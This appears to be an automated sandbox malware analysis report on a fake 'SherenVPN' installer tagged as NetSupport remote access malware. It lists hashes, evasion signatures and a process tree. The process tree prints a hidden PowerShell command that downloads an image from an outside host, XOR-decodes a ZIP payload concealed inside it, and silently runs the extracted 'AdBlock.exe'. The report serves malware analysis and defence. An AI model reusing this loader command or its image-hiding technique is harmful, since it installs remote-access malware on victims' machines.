Analysis
-
max time kernel
149s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-en -
resource tags
-
submitted
18/04/2025, 22:29
General
-
Target
SherenVPN-x64-6-1-6.exe
-
Size
4.2MB
-
MD5
4022690847251ec50dfef8a36991829c
-
SHA1
8bce1444ea17969f21f8c5ed91f1fc5752af1c4a
-
SHA256
ae45484a1881d55afae4952224c4a8352e1163a9fb57d095431711e5dccdcd18
-
SHA512
1e874a44b9918a7661868a74d3c16c6eb750304bacebf72ae393800ff72217f7c47c9311c16ec0088ba03c0a4485b2bd431a9c603935d677e7edfee893d366c2
-
SSDEEP
98304:uxHXs+8aetFyiI7pt4bKvAvIr4cv4D3VFXPn+zKaw:usXCf4bZv84cgxFfn+zKP
Malware Config
Extracted
https://i.postimg.cc/wBWwqh0k/hungary-memee.png
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Netsupport family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 5 IoCs
-
Themida packer 18 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\SherenVPN-x64-6-1-6.exe"C:\Users\Admin\AppData\Local\Temp\SherenVPN-x64-6-1-6.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-3J81P.tmp\SherenVPN-x64-6-1-6.tmp"C:\Users\Admin\AppData\Local\Temp\is-3J81P.tmp\SherenVPN-x64-6-1-6.tmp" /SL5="$130054,3387731,858624,C:\Users\Admin\AppData\Local\Temp\SherenVPN-x64-6-1-6.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$d=(New-Object System.Net.WebClient).DownloadData('https://i.postimg.cc/wBWwqh0k/hungary-memee.png');$k=$d[129];$i=[Text.Encoding]::ASCII.GetString($d).LastIndexOf('IDAT')+4;$z=$d[$i..$d.Length]|%{$_-bxor $k};[IO.File]::WriteAllBytes(\"$env:TEMP\\fqGcmaI.zip\",$z);Expand-Archive -LiteralPath \"$env:TEMP\\fqGcmaI.zip\" -DestinationPath \"$env:TEMP\";Start-Process \"$env:TEMP\\AdBlock.exe\" -WindowStyle Hidden"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AdBlock.exe"C:\Users\Admin\AppData\Local\Temp\AdBlock.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
117KB
MD51f355f4ba841cc3c5ec905cd6d733b3e
SHA1931e10f452ce859b73ba3abe4c2b37a0514ccbb1
SHA2565aa8afe28d34c39d8004a0a1fe942938a36baa4ecd7817cb679854e8e7c18ddb
SHA5124642b44ce4e5628b9d0ba7d9a20324f58e031cbb21848b2ff56dae5473484b284d6624f9fb3a68be4f9aa7bc951509f4d6f3e3b29f64e31ba991473dad63f1a4
-
Filesize
259B
MD54e8ecebce46ceef1f6e29c71b6d3be94
SHA12345f5203dc819c33782d8f3632f13e835066392
SHA25676f0b30a1d93469ab744ac81a2f9f96f180e5df964189d3f9b71aef2673dff46
SHA51280c0949bc0842e036a3ee3ca2023af9465c3f9d6a18a028b1453630a6b1005c9d9b44747600c41899ad551a57510fbe845a7f06df04763ec278189f22b4d2b3e
-
Filesize
4.4MB
MD55f2534e39a9573a4b1cb7fe6b883605c
SHA10fed78b77c970985dc987da46475c3ed63fb1bff
SHA25645d3dbf973e35a691cc8caa08ab7e4d920122e6775358b672109d789be0503ae
SHA512b3d085598aa9056e1810f846dfaf6df5a4abe756d24605931ec8c2045215d1b057693dbbe629cfc226e4b459604d14a07ff2c889e3fcad2f2f5e9dec398ef6f1
-
Filesize
64KB
MD5f4bde1658456fca1af425a5ed35843d4
SHA10392d4a64fc4110811f54d72ba8669da93eab338
SHA2564d7ba182e89f2869b650ac80a34b8f347deb360a3872ee9dca130168b32c87fa
SHA51237d83474bfbfbde3f333176b0ea0cbc287a41dbe3491e0eab6eecb9643158b53e878d020a83d362fb504218609050171920ade3b048a701259995f87cda37b6c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
652B
MD55a1d51c2766fd81896b7918190f0711c
SHA197bff5bd64b32600e59f81f47922ff7df16f14a3
SHA256fc0d9cf9e7d97d4f6b99e0584b7fd029ad72f8f07d4b8c329b5c457afd52b45f
SHA512fca6f0af0bee203011f9167198719f0fb42cd92200c33dfb37353c04ee6db96a55ac51c36bfcb6b2656b22dc6eafcc7aaefa9645ebdd1b11e11b464d3d358c14
-
Filesize
316KB
MD5051cdb6ac8e168d178e35489b6da4c74
SHA138c171457d160f8a6f26baa668f5c302f6c29cd1
SHA2566562585009f15155eea9a489e474cebc4dd2a01a26d846fdd1b93fdc24b0c269
SHA512602ab9999f7164a2d1704f712d8a622d69148eefe9a380c30bc8b310eadedf846ce6ae7940317437d5da59404d141dc2d1e0c3f954ca4ac7ae3497e56fcb4e36
-
Filesize
3.4MB
MD5afda7768e85dee4272a556318808a065
SHA1eb69a834fdd8bc1293046908705249c973a04195
SHA2564b555a3984c5a43101f02b25386edc8bc34d6024927cd38250521989638a9af2
SHA512bd7bb00a4298e2f8fe0da6bd3903d196def6f68881378c0566567107151eae15c899b3e06eaddb67a092e4e5895c4e5c6017d11659e0aa335a49c837301ccbb3
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
106KB
MD567c53a770390e8c038060a1921c20da9
SHA149e63af91169c8ce7ef7de3d6a6fb9f8f739fa3a
SHA2562dfdc169dfc27462adc98dde39306de8d0526dcf4577a1a486c2eef447300689
SHA512201e07dbccd83480d6c4d8562e6d0a9e4c52ed12895f0b91d875c2bbcc50b3b1802e11e5e829c948be302bf98ebde7fb2a99476065d1709b3bdbcd5d59a1612d
-
Filesize
14KB
MD53aabcd7c81425b3b9327a2bf643251c6
SHA1ea841199baa7307280fc9e4688ac75e5624f2181
SHA2560cff893b1e7716d09fb74b7a0313b78a09f3f48c586d31fc5f830bd72ce8331f
SHA51297605b07be34948541462000345f1e8f9a9134d139448d4f331cefeeca6dad51c025fcab09d182b86e5a4a8e2f9412b3745ec86b514b0523497c821cb6b8c592
-
Filesize
7.7MB
-
Filesize
72KB
-
Filesize
3.3MB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
216KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
408KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
200KB
-
Filesize
652KB
-
Filesize
7.7MB
-
Filesize
40KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
600KB
-
Filesize
68KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
408KB
-
Filesize
40KB
-
Filesize
136KB
-
Filesize
3.4MB
-
Filesize
3.4MB
-
Filesize
3.4MB
-
Filesize
3.4MB
-
Filesize
3.4MB
-
Filesize
3.4MB
-
Filesize
3.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
11.4MB
-
Filesize
900KB
-
Filesize
692KB
-
Filesize
900KB
-
Filesize
900KB